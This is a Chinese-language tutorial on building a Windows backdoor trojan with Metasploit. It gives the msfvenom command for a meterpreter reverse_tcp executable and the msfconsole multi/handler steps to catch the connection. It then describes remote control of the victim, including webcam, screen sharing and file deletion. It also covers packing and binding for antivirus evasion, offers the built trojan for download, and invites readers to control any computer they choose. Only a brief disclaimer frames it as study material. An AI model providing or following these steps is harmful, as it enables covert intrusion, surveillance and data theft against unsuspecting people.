生成木马教程

仅限内网使用，外网需要动用内网穿透技术，进行端口映射

made by zhou

注意，本教程的前置教程看完再学习本教程：

前置教程链接

必备工具（此版本安装Kali）：

• Win10/11，优先选择64位的，32位有些不同
• VMware软件，我这里是16版本的，可以选择17版本，此软件虽是付费软件，但是免费的注册码还是有很多的，自己找找（推荐：52pojie）
• Kali的安装，视频上的为正版安装地址，访问慢，建议镜像下载（镜像），这边采用清华镜像站点。

引言

一个7KB的可执行文件可以做什么？在C语言中，使用开发工具如 Dev-C++ 编写简单的程序

C语言示例代码

#include
int main () 
{
    printf("hello, world");
    return(0);
}

上述代码生成的可执行文件（.exe）大约为127KB。这意味着，一个仅7KB的可执行文件可能具有非常简单的功能,实际上，一个7KB的可执行文件可以是一个后门木马，没有经过加花、捆绑或加壳处理。这样的木马通常体积小巧，但具有潜在的恶意功能，比如：

• 远程控制受感染的计算机
• 窃取敏感信息
• 下载并运行其他恶意软件

接下来我将教各位如何生成一个自己的木马，如何使用这个木马远控你想要的计算机

开始教程：

1. 首先，打开 Kali Linux，点击终端，就是火狐浏览器旁边那个黑色的方块。

2. 然后，输入命令：

   msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=你的kaliIP地址 lport=你指定的端口   -f exe -o test.exe

   简单讲就是做一个exe文件，各位采用 ip addr 获得Kali的IP地址再填上去）。 不同的人服务器IP不同，使用 ip addr 查询IP，iport 指的是端口，你自己随便挑一个，目前有6万多个，随便选个数字。至于 windows/x64/meterpreter/reverse_tcp 指的是木马运行的操作系统，这里解释就是必须是Windows，必须是64位，其他自行查阅。

3. 这样，我们就得到了一个裸木马，三秒之内，必备查杀……（虽然msf有免杀模板，你也可以加花，采用其他软件，加壳，捆绑，不过基本都可以查杀出来，让木马裸奔吧，别折腾了）。
4. 其次，我们就（1. 正规学习渠道，用 python3 等 cmd 等，一堆命令把在虚拟机的 exe 文件搞到本地电脑）或者学习我，复制粘贴大法，无视火绒报病毒，直接扔到桌面！一般这个exe文件在主文件夹里面

5. 再者我们输入 msfconsole
   等待一分钟！这样我们就到了msf6
   输入
   

   use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

这个 set payload 后面的按照之前的改,不是固定的。
6. 再输入

   set lhost + 你的IP地址

   （之前写过的，kali的ip）。
7. 再输入

   set iport + 你的设置端口

   （要与之前设定的端口号一样）。
8. 最后输入

   run

   等待。




9. 在目标的主机上运行 exe，就可以远程控制了！目前可以屏幕共享，摄像头开启，文件删除等……

更多

1. 关于后渗透成功后命令：help命令或者这个文档
2. 关于免杀：轻松过360与火绒
3. 目前测试过vmprotect，upx shell，gethwid，themida，exe文件捆绑打包机，超级加花器等 用于加花，捆绑，加壳的软件，均无用，目前待测视频360，火绒过查杀
4. 视频失效，找我拿缓存的（我觉得过不了查杀，估计也不会失效）

放在最后

教程中生成的木马我放这里了，有本事下载运行下，每天黑自己也很无语

免责声明

本教程仅供学习与研究之用，请遵守相关法律法规，切勿用于非法用途。